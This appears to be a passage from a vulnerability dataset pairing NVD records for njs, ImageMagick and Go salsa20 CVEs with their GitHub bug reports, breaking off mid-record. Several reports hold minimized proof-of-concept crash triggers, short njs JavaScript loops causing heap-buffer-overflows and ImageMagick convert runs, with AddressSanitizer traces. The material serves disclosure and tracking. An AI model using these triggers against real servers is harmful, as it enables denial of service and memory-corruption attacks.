v0.shift(v0.splice(0, "AAAA", "BBBB"))
i++;
}
```
```js
$ njs test.js
==21010==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60d00000c700 at pc 0x000000447d20 bp 0x7fffbdc99110 sp 0x7fffbdc99100
WRITE of size 16 at 0x60d00000c700 thread T0
#0 0x447d1f in njs_array_prototype_splice njs/njs_array.c:876
#1 0x45f1f2 in njs_function_native_call njs/njs_function.c:587
#2 0x41bd8f in njs_vmcode_function_call njs/njs_vm.c:2061
#3 0x413d10 in njs_vmcode_interpreter njs/njs_vm.c:159
#4 0x412be5 in njs_vm_start njs/njs.c:594
#5 0x4049a7 in njs_process_script njs/njs_shell.c:770
#6 0x403f7d in njs_process_file njs/njs_shell.c:619
#7 0x402aa9 in main njs/njs_shell.c:281
0x60d00000c700 is located 0 bytes to the right of 128-byte region [0x60d00000c680,0x60d00000c700)
allocated by thread T0 here:
#0 0x7f5803b3a076 in __interceptor_posix_memalign (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99076)
#1 0x4b5c7d in nxt_memalign nxt/nxt_malloc.c:26
#2 0x4100ec in njs_align njs/njs.c:41
#3 0x40b5aa in nxt_mp_alloc_large nxt/nxt_mp.c:594
#4 0x40b3cf in nxt_mp_align nxt/nxt_mp.c:353
#5 0x444eb8 in njs_array_alloc njs/njs_array.c:148
#6 0x4145ee in njs_vmcode_array njs/njs_vm.c:342
#7 0x413d10 in njs_vmcode_interpreter njs/njs_vm.c:159
#8 0x412be5 in njs_vm_start njs/njs.c:594
#9 0x4049a7 in njs_process_script njs/njs_shell.c:770
#10 0x403f7d in njs_process_file njs/njs_shell.c:619
#11 0x402aa9 in main njs/njs_shell.c:281
SUMMARY: AddressSanitizer: heap-buffer-overflow njs/njs_array.c:876 njs_array_prototype_splice
Shadow bytes around the buggy address:
0x0c1a7fff9890: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1a7fff98a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1a7fff98b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1a7fff98c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1a7fff98d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c1a7fff98e0:[fa]fa fa fa fa fa fa fa fa fa 00 00 00 00 00 00
0x0c1a7fff98f0: 00 00 00 00 00 00 00 00 00 00 fa fa fa fa fa fa
0x0c1a7fff9900: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c1a7fff9910: fd fd fd fd fa fa fa fa fa fa fa fa fa fa 00 00
0x0c1a7fff9920: 00 00 00 00 00 00 00 00 00 00 00 00 00 fa fa fa
```
Probably is the same as #152 (memory corruption while resizing).
Minified test from [fluff](https://github.com/Samsung/Fluff) report. | heap-buffer-overflow in Array.prototype.splice() after resize. | https://api.github.com/repos/nginx/njs/issues/153/comments | 0 | 2019-05-07T17:43:35Z | 2019-05-14T17:37:45Z | https://github.com/nginx/njs/issues/153 | 441,355,829 | 153 |
CVE-2019-11839 | 2019-05-09T14:29:00.637 | njs through 0.3.1, used in NGINX, has a heap-based buffer overflow in Array.prototype.push after a resize, related to njs_array_prototype_push in njs/njs_array.c, because of njs_array_expand size mishandling. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Issue Tracking",
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/nginx/njs/issues/152"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:f5:njs:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3F70BB50-E3EC-44F8-BC1A-D514EA261742",
"versionEndExcluding": null,
"versionEndIncluding": "0.3.1",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/nginx/njs/issues/152 | [
"Issue Tracking",
"Exploit",
"Third Party Advisory"
] | github.com | [
"nginx",
"njs"
] | ```js
var v0=[], i = 0;
while (i++ < 100) {
v0.push(v0.shift(0));
}
```
```sh
$ njs test.js
==13374==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60d00000c7d0 at pc 0x000000447165 bp 0x7ffd25e422b0 sp 0x7ffd25e422a
0
WRITE of size 16 at 0x60d00000c7d0 thread T0
#0 0x447164 in njs_array_prototype_push njs/njs_array.c:679
#1 0x45f1f2 in njs_function_native_call njs/njs_function.c:587
#2 0x41bd8f in njs_vmcode_function_call njs/njs_vm.c:2061
#3 0x413d10 in njs_vmcode_interpreter njs/njs_vm.c:159
#4 0x412be5 in njs_vm_start njs/njs.c:594
#5 0x4049a7 in njs_process_script njs/njs_shell.c:770
#6 0x403f7d in njs_process_file njs/njs_shell.c:619
#7 0x402aa9 in main njs/njs_shell.c:281
0x60d00000c7d0 is located 0 bytes to the right of 128-byte region [0x60d00000c750,0x60d00000c7d0)
allocated by thread T0 here:
#0 0x7f297b5a5076 in __interceptor_posix_memalign (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99076)
#1 0x4b5c7d in nxt_memalign nxt/nxt_malloc.c:26
#2 0x4100ec in njs_align njs/njs.c:41
#3 0x40b5aa in nxt_mp_alloc_large nxt/nxt_mp.c:594
#4 0x40b3cf in nxt_mp_align nxt/nxt_mp.c:353
#5 0x444eb8 in njs_array_alloc njs/njs_array.c:148
#6 0x4145ee in njs_vmcode_array njs/njs_vm.c:342
#7 0x413d10 in njs_vmcode_interpreter njs/njs_vm.c:159
#8 0x412be5 in njs_vm_start njs/njs.c:594
#9 0x4049a7 in njs_process_script njs/njs_shell.c:770
#10 0x403f7d in njs_process_file njs/njs_shell.c:619
#11 0x402aa9 in main njs/njs_shell.c:281
SUMMARY: AddressSanitizer: heap-buffer-overflow njs/njs_array.c:679 njs_array_prototype_push
Shadow bytes around the buggy address:
0x0c1a7fff98a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1a7fff98b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1a7fff98c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1a7fff98d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1a7fff98e0: fa fa fa fa fa fa fa fa fa fa 00 00 00 00 00 00
=>0x0c1a7fff98f0: 00 00 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa
0x0c1a7fff9900: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c1a7fff9910: fd fd fd fd fa fa fa fa fa fa fa fa fa fa 00 00
0x0c1a7fff9920: 00 00 00 00 00 00 00 00 00 00 00 00 00 fa fa fa
0x0c1a7fff9930: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c1a7fff9940: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
```
Minified test from [fluff](https://github.com/Samsung/Fluff) report. | heap-buffer-overflow in Array.prototype.push() after resize. | https://api.github.com/repos/nginx/njs/issues/152/comments | 0 | 2019-05-07T17:30:56Z | 2019-05-08T22:22:13Z | https://github.com/nginx/njs/issues/152 | 441,350,927 | 152 |
CVE-2017-12805 | 2019-05-09T16:29:00.327 | In ImageMagick 7.0.6-6, a memory exhaustion vulnerability was found in the function ReadTIFFImage, which allows attackers to cause a denial of service. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00001.html"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/issues/664"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00030.html"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PF62B5PJA2JDUOCKJGUQO3SPL74BEYSV/"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WHIKB4TP6KBJWT2UIPWL5MWMG5QXKGEJ/"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://usn.ubuntu.com/4034-1/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.6-6:*:*:*:*:*:*:*",
"matchCriteriaId": "157776E9-D30D-48D2-B845-ED6315B8C5DC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/ImageMagick/ImageMagick/issues/664 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ```
root@ubuntu:/home/hjy/Desktop# convert oom-ReadTIFFImage /dev/null
==27669==ERROR: AddressSanitizer failed to allocate 0x80002000 (-2147475456) bytes of LargeMmapAllocator: 12
==27669==Process memory map follows:
0x08048000-0x09714000 /usr/local/bin/magick
0x09714000-0x09715000 /usr/local/bin/magick
0x09715000-0x0979f000 /usr/local/bin/magick
0x0979f000-0x097a3000
0x1ffff000-0x24000000
0x24000000-0x28000000
0x28000000-0x40000000
0xb2500000-0xb2600000
0xb2700000-0xb2800000
0xb2900000-0xb2a00000
0xb2b00000-0xb2c00000
0xb2d00000-0xb2e00000
0xb2f00000-0xb3000000
0xb3100000-0xb3200000
0xb3300000-0xb3400000
0xb3500000-0xb3600000
0xb3700000-0xb3800000
0xb3900000-0xb3a00000
0xb3b00000-0xb3c00000
0xb3d00000-0xb3e00000
0xb3f00000-0xb4100000 /usr/lib/locale/locale-archive
0xb4100000-0xb4200000
0xb4300000-0xb4400000
0xb4500000-0xb4600000
0xb4700000-0xb4800000
0xb4900000-0xb4a00000
0xb4b00000-0xb4c00000
0xb4d00000-0xb4e00000
0xb4f00000-0xb5000000
0xb5100000-0xb5200000
0xb5300000-0xb5400000
0xb5500000-0xb5600000
0xb5700000-0xb5800000
0xb5900000-0xb5a00000
0xb5ae0000-0xb5c00000
0xb5c05000-0xb5c6a000
0xb5c6a000-0xb5c6b000 /usr/lib/locale/locale-archive
0xb5c6b000-0xb6e21000
0xb6e21000-0xb6e45000 /lib/i386-linux-gnu/liblzma.so.5.0.0
0xb6e45000-0xb6e46000 /lib/i386-linux-gnu/liblzma.so.5.0.0
0xb6e46000-0xb6e47000 /lib/i386-linux-gnu/liblzma.so.5.0.0
0xb6e47000-0xb6e4a000 /lib/i386-linux-gnu/libdl-2.19.so
0xb6e4a000-0xb6e4b000 /lib/i386-linux-gnu/libdl-2.19.so
0xb6e4b000-0xb6e4c000 /lib/i386-linux-gnu/libdl-2.19.so
0xb6e4c000-0xb6ff5000 /lib/i386-linux-gnu/libc-2.19.so
0xb6ff5000-0xb6ff7000 /lib/i386-linux-gnu/libc-2.19.so
0xb6ff7000-0xb6ff8000 /lib/i386-linux-gnu/libc-2.19.so
0xb6ff8000-0xb6ffb000
0xb6ffb000-0xb7013000 /lib/i386-linux-gnu/libpthread-2.19.so
0xb7013000-0xb7014000 /lib/i386-linux-gnu/libpthread-2.19.so
0xb7014000-0xb7015000 /lib/i386-linux-gnu/libpthread-2.19.so
0xb7015000-0xb7017000
0xb7017000-0xb7032000 /lib/i386-linux-gnu/libgcc_s.so.1
0xb7032000-0xb7033000 /lib/i386-linux-gnu/libgcc_s.so.1
0xb7033000-0xb7034000 /lib/i386-linux-gnu/libgcc_s.so.1
0xb7034000-0xb7035000
0xb7035000-0xb7079000 /lib/i386-linux-gnu/libm-2.19.so
0xb7079000-0xb707a000 /lib/i386-linux-gnu/libm-2.19.so
0xb707a000-0xb707b000 /lib/i386-linux-gnu/libm-2.19.so
0xb707b000-0xb70a9000 /usr/lib/i386-linux-gnu/libgomp.so.1.0.0
0xb70a9000-0xb70aa000 /usr/lib/i386-linux-gnu/libgomp.so.1.0.0
0xb70aa000-0xb70ab000 /usr/lib/i386-linux-gnu/libgomp.so.1.0.0
0xb70ab000-0xb70c3000 /lib/i386-linux-gnu/libz.so.1.2.8
0xb70c3000-0xb70c4000 /lib/i386-linux-gnu/libz.so.1.2.8
0xb70c4000-0xb70c5000 /lib/i386-linux-gnu/libz.so.1.2.8
0xb70c5000-0xb721a000 /usr/lib/i386-linux-gnu/libxml2.so.2.9.1
0xb721a000-0xb721b000 /usr/lib/i386-linux-gnu/libxml2.so.2.9.1
0xb721b000-0xb721f000 /usr/lib/i386-linux-gnu/libxml2.so.2.9.1
0xb721f000-0xb7220000 /usr/lib/i386-linux-gnu/libxml2.so.2.9.1
0xb7220000-0xb7221000
0xb7221000-0xb7247000 /lib/i386-linux-gnu/libpng12.so.0.50.0
0xb7247000-0xb7248000 /lib/i386-linux-gnu/libpng12.so.0.50.0
0xb7248000-0xb7249000 /lib/i386-linux-gnu/libpng12.so.0.50.0
0xb7249000-0xb724a000
0xb724a000-0xb7293000 /usr/lib/i386-linux-gnu/libjpeg.so.8.0.2
0xb7293000-0xb7294000 /usr/lib/i386-linux-gnu/libjpeg.so.8.0.2
0xb7294000-0xb7295000 /usr/lib/i386-linux-gnu/libjpeg.so.8.0.2
0xb7295000-0xb72a5000
0xb72a5000-0xb7344000 /usr/lib/i386-linux-gnu/libasan.so.1.0.0
0xb7344000-0xb7346000 /usr/lib/i386-linux-gnu/libasan.so.1.0.0
0xb7346000-0xb7347000 /usr/lib/i386-linux-gnu/libasan.so.1.0.0
0xb7347000-0xb77a0000
0xb77a0000-0xb77b6000
0xb77b6000-0xb77b7000 [vdso]
0xb77b7000-0xb77d7000 /lib/i386-linux-gnu/ld-2.19.so
0xb77d7000-0xb77d8000 /lib/i386-linux-gnu/ld-2.19.so
0xb77d8000-0xb77d9000 /lib/i386-linux-gnu/ld-2.19.so
0xbfd8c000-0xbfdad000 [stack]
==27669==End of process memory map.
==27669==AddressSanitizer CHECK failed: ../../../../src/libsanitizer/sanitizer_common/sanitizer_posix.cc:66 "(("unable to mmap" && 0)) != (0)" (0x0, 0x0)
#0 0xb72f94c1 (/usr/lib/i386-linux-gnu/libasan.so.1+0x544c1)
#1 0xb72fd6a9 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/usr/lib/i386-linux-gnu/libasan.so.1+0x586a9)
#2 0xb7302e22 (/usr/lib/i386-linux-gnu/libasan.so.1+0x5de22)
#3 0xb72bd99b (/usr/lib/i386-linux-gnu/libasan.so.1+0x1899b)
#4 0xb72be488 (/usr/lib/i386-linux-gnu/libasan.so.1+0x19488)
#5 0xb72f384a in __interceptor_malloc (/usr/lib/i386-linux-gnu/libasan.so.1+0x4e84a)
#6 0x8baef7a in AcquireQuantumPixels MagickCore/quantum.c:175
#7 0x8baef7a in SetQuantumDepth MagickCore/quantum.c:693
#8 0x877f852 in ReadTIFFImage coders/tiff.c:1655
#9 0x88baf5e in ReadImage MagickCore/constitute.c:497
#10 0x88bea44 in ReadImages MagickCore/constitute.c:866
#11 0x8ec36d8 in ConvertImageCommand MagickWand/convert.c:641
#12 0x8fc9e99 in MagickCommandGenesis MagickWand/mogrify.c:183
#13 0x8077d9a in MagickMain utilities/magick.c:149
#14 0x80579ca in main utilities/magick.c:180
#15 0xb6e65a82 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x19a82)
#16 0x807737a (/usr/local/bin/magick+0x807737a)
```
POC https://github.com/whiteHat001/FUZZ_POC/blob/master/oom-ReadTIFFImage | memory exhaustion in ReadTIFFImage | https://api.github.com/repos/ImageMagick/ImageMagick/issues/664/comments | 2 | 2017-08-10T05:00:53Z | 2019-05-10T01:41:54Z | https://github.com/ImageMagick/ImageMagick/issues/664 | 249,233,709 | 664 |
CVE-2017-12806 | 2019-05-09T16:29:00.373 | In ImageMagick 7.0.6-6, a memory exhaustion vulnerability was found in the function format8BIM, which allows attackers to cause a denial of service. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00001.html"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/issues/660"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.debian.org/debian-lts-announce/2020/09/msg00007.html"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PF62B5PJA2JDUOCKJGUQO3SPL74BEYSV/"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WHIKB4TP6KBJWT2UIPWL5MWMG5QXKGEJ/"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://usn.ubuntu.com/4034-1/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.6-6:*:*:*:*:*:*:*",
"matchCriteriaId": "157776E9-D30D-48D2-B845-ED6315B8C5DC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/ImageMagick/ImageMagick/issues/660 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ```
root@ubuntu:/home/hjy/Desktop# convert oom-format8BIM /dev/null
==8638==ERROR: AddressSanitizer failed to allocate 0x72e8d000 (1927860224) bytes of LargeMmapAllocator: 12
==8638==Process memory map follows:
0x08048000-0x0971a000 /usr/local/bin/magick
0x0971a000-0x0971b000 /usr/local/bin/magick
0x0971b000-0x097a5000 /usr/local/bin/magick
0x097a5000-0x097a9000
0x1ffff000-0x24000000
0x24000000-0x28000000
0x28000000-0x40000000
0xb1f00000-0xb2000000
0xb2100000-0xb2200000
0xb2300000-0xb2400000
0xb2500000-0xb2600000
0xb2700000-0xb2800000
0xb2900000-0xb2a00000
0xb2b00000-0xb2c00000
0xb2d00000-0xb2e00000
0xb2f00000-0xb3000000
0xb3100000-0xb3200000
0xb3300000-0xb3400000
0xb3500000-0xb3600000
0xb3700000-0xb3800000
0xb3900000-0xb3a00000
0xb3b00000-0xb3c00000
0xb3d00000-0xb3e00000
0xb3f00000-0xb4100000 /usr/lib/locale/locale-archive
0xb4100000-0xb4200000
0xb4300000-0xb4400000
0xb4500000-0xb4600000
0xb4700000-0xb4800000
0xb4900000-0xb4a00000
0xb4b00000-0xb4c00000
0xb4d00000-0xb4e00000
0xb4f00000-0xb5000000
0xb5100000-0xb5200000
0xb5300000-0xb5400000
0xb5500000-0xb5600000
0xb5700000-0xb5800000
0xb5900000-0xb5a00000
0xb5abb000-0xb5c10000
0xb5c10000-0xb5c50000
0xb5c50000-0xb5c51000 /usr/lib/locale/locale-archive
0xb5c51000-0xb6e07000
0xb6e07000-0xb6e2b000 /lib/i386-linux-gnu/liblzma.so.5.0.0
0xb6e2b000-0xb6e2c000 /lib/i386-linux-gnu/liblzma.so.5.0.0
0xb6e2c000-0xb6e2d000 /lib/i386-linux-gnu/liblzma.so.5.0.0
0xb6e2d000-0xb6e30000 /lib/i386-linux-gnu/libdl-2.19.so
0xb6e30000-0xb6e31000 /lib/i386-linux-gnu/libdl-2.19.so
0xb6e31000-0xb6e32000 /lib/i386-linux-gnu/libdl-2.19.so
0xb6e32000-0xb6fdb000 /lib/i386-linux-gnu/libc-2.19.so
0xb6fdb000-0xb6fdd000 /lib/i386-linux-gnu/libc-2.19.so
0xb6fdd000-0xb6fde000 /lib/i386-linux-gnu/libc-2.19.so
0xb6fde000-0xb6fe1000
0xb6fe1000-0xb6ff9000 /lib/i386-linux-gnu/libpthread-2.19.so
0xb6ff9000-0xb6ffa000 /lib/i386-linux-gnu/libpthread-2.19.so
0xb6ffa000-0xb6ffb000 /lib/i386-linux-gnu/libpthread-2.19.so
0xb6ffb000-0xb6ffd000
0xb6ffd000-0xb7018000 /lib/i386-linux-gnu/libgcc_s.so.1
0xb7018000-0xb7019000 /lib/i386-linux-gnu/libgcc_s.so.1
0xb7019000-0xb701a000 /lib/i386-linux-gnu/libgcc_s.so.1
0xb701a000-0xb701b000
0xb701b000-0xb705f000 /lib/i386-linux-gnu/libm-2.19.so
0xb705f000-0xb7060000 /lib/i386-linux-gnu/libm-2.19.so
0xb7060000-0xb7061000 /lib/i386-linux-gnu/libm-2.19.so
0xb7061000-0xb708f000 /usr/lib/i386-linux-gnu/libgomp.so.1.0.0
0xb708f000-0xb7090000 /usr/lib/i386-linux-gnu/libgomp.so.1.0.0
0xb7090000-0xb7091000 /usr/lib/i386-linux-gnu/libgomp.so.1.0.0
0xb7091000-0xb70a9000 /lib/i386-linux-gnu/libz.so.1.2.8
0xb70a9000-0xb70aa000 /lib/i386-linux-gnu/libz.so.1.2.8
0xb70aa000-0xb70ab000 /lib/i386-linux-gnu/libz.so.1.2.8
0xb70ab000-0xb7200000 /usr/lib/i386-linux-gnu/libxml2.so.2.9.1
0xb7200000-0xb7201000 /usr/lib/i386-linux-gnu/libxml2.so.2.9.1
0xb7201000-0xb7205000 /usr/lib/i386-linux-gnu/libxml2.so.2.9.1
0xb7205000-0xb7206000 /usr/lib/i386-linux-gnu/libxml2.so.2.9.1
0xb7206000-0xb7207000
0xb7207000-0xb722d000 /lib/i386-linux-gnu/libpng12.so.0.50.0
0xb722d000-0xb722e000 /lib/i386-linux-gnu/libpng12.so.0.50.0
0xb722e000-0xb722f000 /lib/i386-linux-gnu/libpng12.so.0.50.0
0xb722f000-0xb7230000
0xb7230000-0xb7279000 /usr/lib/i386-linux-gnu/libjpeg.so.8.0.2
0xb7279000-0xb727a000 /usr/lib/i386-linux-gnu/libjpeg.so.8.0.2
0xb727a000-0xb727b000 /usr/lib/i386-linux-gnu/libjpeg.so.8.0.2
0xb727b000-0xb728b000
0xb728b000-0xb732a000 /usr/lib/i386-linux-gnu/libasan.so.1.0.0
0xb732a000-0xb732c000 /usr/lib/i386-linux-gnu/libasan.so.1.0.0
0xb732c000-0xb732d000 /usr/lib/i386-linux-gnu/libasan.so.1.0.0
0xb732d000-0xb7786000
0xb7786000-0xb779c000
0xb779c000-0xb779d000 [vdso]
0xb779d000-0xb77bd000 /lib/i386-linux-gnu/ld-2.19.so
0xb77bd000-0xb77be000 /lib/i386-linux-gnu/ld-2.19.so
0xb77be000-0xb77bf000 /lib/i386-linux-gnu/ld-2.19.so
0xbfa59000-0xbfa7a000 [stack]
==8638==End of process memory map.
==8638==AddressSanitizer CHECK failed: ../../../../src/libsanitizer/sanitizer_common/sanitizer_posix.cc:66 "(("unable to mmap" && 0)) != (0)" (0x0, 0x0)
#0 0xb72df4c1 (/usr/lib/i386-linux-gnu/libasan.so.1+0x544c1)
#1 0xb72e36a9 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/usr/lib/i386-linux-gnu/libasan.so.1+0x586a9)
#2 0xb72e8e22 (/usr/lib/i386-linux-gnu/libasan.so.1+0x5de22)
#3 0xb72a399b (/usr/lib/i386-linux-gnu/libasan.so.1+0x1899b)
#4 0xb72a4488 (/usr/lib/i386-linux-gnu/libasan.so.1+0x19488)
#5 0xb72d984a in __interceptor_malloc (/usr/lib/i386-linux-gnu/libasan.so.1+0x4e84a)
#6 0x83de42c in format8BIM coders/meta.c:2184
#7 0x83e285c in WriteMETAImage coders/meta.c:2315
#8 0x88c579f in WriteImage MagickCore/constitute.c:1114
#9 0x88c733a in WriteImages MagickCore/constitute.c:1333
#10 0x8ed049c in ConvertImageCommand MagickWand/convert.c:3280
#11 0x8fd1411 in MagickCommandGenesis MagickWand/mogrify.c:183
#12 0x80775f2 in MagickMain utilities/magick.c:149
#13 0x805791a in main utilities/magick.c:180
#14 0xb6e4ba82 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x19a82)
#15 0x8076c5a (/usr/local/bin/magick+0x8076c5a)
```POC https://github.com/whiteHat001/FUZZ_POC/blob/master/oom-format8BIM | memory exhaustion in format8BIM | https://api.github.com/repos/ImageMagick/ImageMagick/issues/660/comments | 2 | 2017-08-08T03:28:18Z | 2019-05-10T01:41:26Z | https://github.com/ImageMagick/ImageMagick/issues/660 | 248,590,588 | 660 |
CVE-2019-11840 | 2019-05-09T16:29:00.607 | An issue was discovered in the supplementary Go cryptography library, golang.org/x/crypto, before v0.0.0-20190320223903-b7391e95e576. A flaw was found in the amd64 implementation of the golang.org/x/crypto/salsa20 and golang.org/x/crypto/salsa20/salsa packages. If more than 256 GiB of keystream is generated, or if the counter otherwise grows greater than 32 bits, the amd64 implementation will first generate incorrect output, and then cycle back to previously generated keystream. Repeated keystream bytes can lead to loss of confidentiality in encryption applications, or to predictability in CSPRNG applications. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.2,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1691529"
},
{
"source": "[email protected]",
